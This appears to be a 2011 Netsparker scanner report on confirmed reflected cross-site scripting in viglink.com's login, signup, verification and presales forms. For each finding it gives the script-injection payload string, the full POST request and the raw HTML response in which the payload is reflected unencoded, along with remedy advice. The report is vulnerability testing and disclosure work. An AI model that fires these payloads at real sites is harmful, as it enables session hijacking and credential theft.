Netsparker, Web Application Security Scanner

XSS, www.viglink.com REPORT SUMMARY


Netsparker - Scan Report Summary
TARGET URL
https://www.viglink.com/users/action/login
SCAN DATE
4/18/2011 6:51:32 PM
REPORT DATE
4/18/2011 7:12:01 PM
SCAN DURATION
00:04:46

Total Requests
Average Speed (req/sec.)
19 identified
10 confirmed
0 critical
2 informational

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

IMPORTANT 37 %
MEDIUM 32 %
LOW 21 %
INFORMATION 11 %
Cross-site Scripting

6 TOTAL, IMPORTANT, 5 CONFIRMED
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This opens several different attack opportunities, most commonly hijacking the user's current session, or changing the look of the page by rewriting its HTML on the fly in order to steal the user's credentials. The root cause is that input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application rather than the server. Although this is a limitation, it still lets attackers hijack other users' sessions, and an attacker who targets an administrator can gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hijacking users' active sessions.
  • Changing the look of the page within the victim's browser.
  • Mounting a successful phishing attack.
  • Intercepting data and performing man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input to and output from the application should be filtered. Output should be encoded according to the output format and location; typically the output location is HTML. Where the output is HTML, ensure that all active content is removed or encoded before it is presented to the user.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well-structured white-list libraries available for many different environments; good examples include OWASP Reform and the Microsoft Anti-Cross-site Scripting library.

- /users/action/send-verification

/users/action/send-verification CONFIRMED

https://www.viglink.com/users/action/send-verification

Parameters

Parameter Type Value
email POST '"--></style></script><script>alert(0x00041F)</script>

Request

POST /users/action/send-verification HTTP/1.1
Referer: https://www.viglink.com/users/send-verification
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.viglink.com
Cookie: JSESSIONID=A406683588D7BD88342AC125C6ACA8B1; vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96
Content-Length: 91
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00041F)%3c%2fscript%3e

Response

HTTP/1.0 200 OK
Date: Mon, 18 Apr 2011 23:52:10 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: JSESSIONID=195320B75C60819447CDA4AC0D54C0D6; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2121
Connection: close


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>VigLink - Verify</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? 
'.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><span class="delimiter"></span> <ul class="navigation"> <li><a href="/users/signup">Sign Up</a></li><li><a href="/users/login">Log In</a></li></ul> </div></div><div id="body"> <div id="flash" class="error"> <p>&#039;&#034;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00041F)&lt;/script&gt; is not a registered account.</p><div class="left corner"></div> <div class="right corner"></div> </div><div class="column span-8"> <h2>Send Verification Email</h2> <p> Complete this form to receive a verification email and activate your account or reset your password. If you are not receiving email from us, try adding system@viglink.com to your address&nbsp;book. 
<p> <form action="/users/action/send-verification" class="verify_email" id="verify_email" method="post"> <label for="email">Email</label> <input id="email" name="email" size="30" type="text" value="'"--></style></script><script>netsparker(0x00041F)</script>"/> <input name="commit" type="submit" value="Send Email"/> </form></div></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.245.213.194) --></body></html>
- /users/action/login

/users/action/login CONFIRMED

https://www.viglink.com/users/action/login

Parameters

Parameter Type Value
authRedirect POST /users/
email POST '"--></style></script><script>alert(0x00043F)</script>
password POST 3

Request

POST /users/action/login HTTP/1.1
Referer: https://www.viglink.com/users/login?_ek=tl&ar=%2Fusers%2F
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.viglink.com
Cookie: JSESSIONID=B6B3B4173879BB67AB8A8378D7CDCFA6; vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96
Content-Length: 127
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

authRedirect=%2fusers%2f&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00043F)%3c%2fscript%3e&password=3

Response

HTTP/1.0 200 OK
Date: Mon, 18 Apr 2011 23:52:16 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2045
Connection: close


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>VigLink - Sign In</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? 
'.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul></div></div><div id="body"> <div id="flash" class="error"> <p>Incorrect email/password.</p><div class="left corner"></div> <div class="right corner"></div> </div><div class="column span-8"> <h2>Log In</h2> <form action="https://www.viglink.com/users/action/login" method="post"> <input type="hidden" name="authRedirect" value=""/> <label for="email">Email:</label> <input id="email" name="email" size="30" type="text" value="'"--></style></script><script>netsparker(0x00043F)</script>" placeholder="you@example.com"/> <label for="password">Password:</label> <input id="password" name="password" size="30" type="password"/> <button type="submit">Log In</button> <ul class="actions"> <li><a href="/users/send-verification">I forgot my password</a></li> <li>Need an account? 
<a href="/users/signup">Sign up</a></li> </ul> </form></div></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.242.201.220) --></body></html>
- /users/action/send-verification

/users/action/send-verification CONFIRMED

https://www.viglink.com/users/action/send-verification

Parameters

Parameter Type Value
email POST '"--></style></script><script>alert(0x000473)</script>
commit POST Send Email

Request

POST /users/action/send-verification HTTP/1.1
Referer: https://www.viglink.com/users/send-verification
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.viglink.com
Cookie: JSESSIONID=25E61EE723B255F4A5709C0107955670; vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96
Content-Length: 109
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000473)%3c%2fscript%3e&commit=Send+Email

Response

HTTP/1.0 200 OK
Date: Mon, 18 Apr 2011 23:52:26 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: JSESSIONID=82C8C30DB5F593AAFD06AAB37D2AA412; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2121
Connection: close


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>VigLink - Verify</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? 
'.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><span class="delimiter"></span> <ul class="navigation"> <li><a href="/users/signup">Sign Up</a></li><li><a href="/users/login">Log In</a></li></ul> </div></div><div id="body"> <div id="flash" class="error"> <p>&#039;&#034;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000473)&lt;/script&gt; is not a registered account.</p><div class="left corner"></div> <div class="right corner"></div> </div><div class="column span-8"> <h2>Send Verification Email</h2> <p> Complete this form to receive a verification email and activate your account or reset your password. If you are not receiving email from us, try adding system@viglink.com to your address&nbsp;book. 
<p> <form action="/users/action/send-verification" class="verify_email" id="verify_email" method="post"> <label for="email">Email</label> <input id="email" name="email" size="30" type="text" value="'"--></style></script><script>netsparker(0x000473)</script>"/> <input name="commit" type="submit" value="Send Email"/> </form></div></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.242.201.220) --></body></html>
- /users/action/signup

/users/action/signup CONFIRMED

https://www.viglink.com/users/action/signup

Parameters

Parameter Type Value
email POST '"--></style></script><script>alert(0x0004A8)</script>

Request

POST /users/action/signup HTTP/1.1
Referer: https://www.viglink.com/users/signup
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.viglink.com
Cookie: JSESSIONID=7572B98F9F6CD9141BDF20CE02DD3304; vglnk.Agent.p=2a85645e86606155fb48bdd87df159eb
Content-Length: 91
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004A8)%3c%2fscript%3e

Response

HTTP/1.0 200 OK
Date: Mon, 18 Apr 2011 23:52:32 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2311
Connection: close


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>VigLink - Sign Up</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? 
'.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><link rel="stylesheet" type="text/css" href="/combined.css.h123230883.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul></div></div><div id="body"> <div id="flash" class="error"> <p>&#039;&#039;&#034;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0004A8)&lt;/script&gt;&#039; is not a valid email address.</p><div class="left corner"></div> <div class="right corner"></div> </div><ul class="navigation"> <li class=" selected"><span class="step">1</span>Sign Up</li><li><span class="step">2</span>Verify Your Account</li><li><span class="step">3</span>Install VigLink on Your Sites</li></ul><h2>Sign Up</h2><form action="/users/action/signup" method="post" id="signup-email-form"> <label for="email">Email:</label> <input id="email" name="email" size="30" type="text" value="'"--></style></script><script>netsparker(0x0004A8)</script>" placeholder="you@example.com"/> <button type="submit">Join Free</button> <ul class="actions"> <li>Already have an account? <a href="/users/login">Log in</a></li> </ul></form><script type="text/javascript"> if( ! $('#flash').length && location.search.match( /[?&]dr=/i ) ) { $(document).ready( function() { flash.news( '<h4>Driving Revenue is now part of VigLink!</h4> Find out more on the\ <a href="http://blog.viglink.com/2010/08/02/viglink-acquires-driving-revenue/">\ VigLink blog</a>. 
Sign up now to get all of the benefits of\ Driving Revenue with VigLink.' ); $('#flash').addClass('dr'); } ); }</script></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.245.213.194) --></body></html>
- /users/action/presales

/users/action/presales CONFIRMED

http://www.viglink.com/users/action/presales

Parameters

Parameter Type Value
email POST you@example.com
domain POST '"--></style></script><script>alert(0x000504)</script>

Request

POST /users/action/presales HTTP/1.1
Referer: http://www.viglink.com/corp/publishers
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.viglink.com
Cookie: JSESSIONID=DC92E13870D74AEEFB7C26AEB8FE179F; vglnk.Agent.p=2a85645e86606155fb48bdd87df159eb
Content-Length: 116
Accept-Encoding: gzip, deflate

email=you%40example.com&domain='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000504)%3c%2fscript%3e

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Encoding:
Content-Language: en
Content-Type: text/html;charset=UTF-8
Date: Mon, 18 Apr 2011 23:52:40 GMT
Expires: -1
Pragma: no-cache
Set-Cookie: JSESSIONID=7190EE1415B13377F192FAD71B8735E4; Path=/
Vary: Accept-Encoding
Content-Length: 3698
Connection: keep-alive


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>VigLink - Publishers</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? 
'.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><link rel="stylesheet" type="text/css" href="/combined.css.h370935560.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><script type="text/javascript" src="/combined.js.h1095210803.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li class=" selected"><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><span class="delimiter"></span> <ul class="navigation"> <li><a href="/users/signup">Sign Up</a></li><li><a href="/users/login">Log In</a></li></ul> </div></div><div id="body"> <div id="flash" class="error"> <p>Invalid website &#039;&#039;&#034;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000504)&lt;/script&gt;&#039;</p><div class="left corner"></div> <div class="right corner"></div> </div><div id="subheader">
<h2 class="tagline">
Are you leaving money on the table?</h2>

<div class="column span-8">
<p class="intro">
Install VigLink on your site with a few lines of HTML and be instantly
enrolled in thousands of affiliate programs. Even before you make your
first cent, our analytics will help you find your most valuable links.
</p>
</div>

<div class="column span-4">
<a href="/users/signup" class="default button">Try it, it&#39;s free</a>
</div>
</div>

<div>
<div class="column span-7">
<h3>The universal affiliate program</h3>

<p>
There are <strong>more than 12,500 sites</strong> that pay commissions for
your traffic!
</p>

<ul>
<li>They each have a signup form.</li>
<li>They each have different ways to link with codes that go stale quickly.</li>
<li>They each have minimums that you need to reach or you&#39;ll never get paid.</li>
</ul>

<p>
<strong>One quick and easy install from VigLink and all those problems are
solved!</strong> Automatically participate in every program. Stay up to
date when merchants change their link codes. Enjoy one global minimum
across every program. You'll never have to register for an affiliate
program again!
</p>
</div>

<div id="logos" class="column span-5">
<ul class="logos">
</ul>
<a href="/partners">More Partners</a>
</div>
</div>

<div>
<div class="column span-5" id="analytics">
<img src="/public/images/features/analytics.png" width="345" height="219" alt="Charts and graphs" id="analytics"/>
</div>

<div class="column span-7">
<h3>Powerful analytics for new insight</h3>

<p>
VigLink provides <strong>comprehensive, real-time reports</strong> that
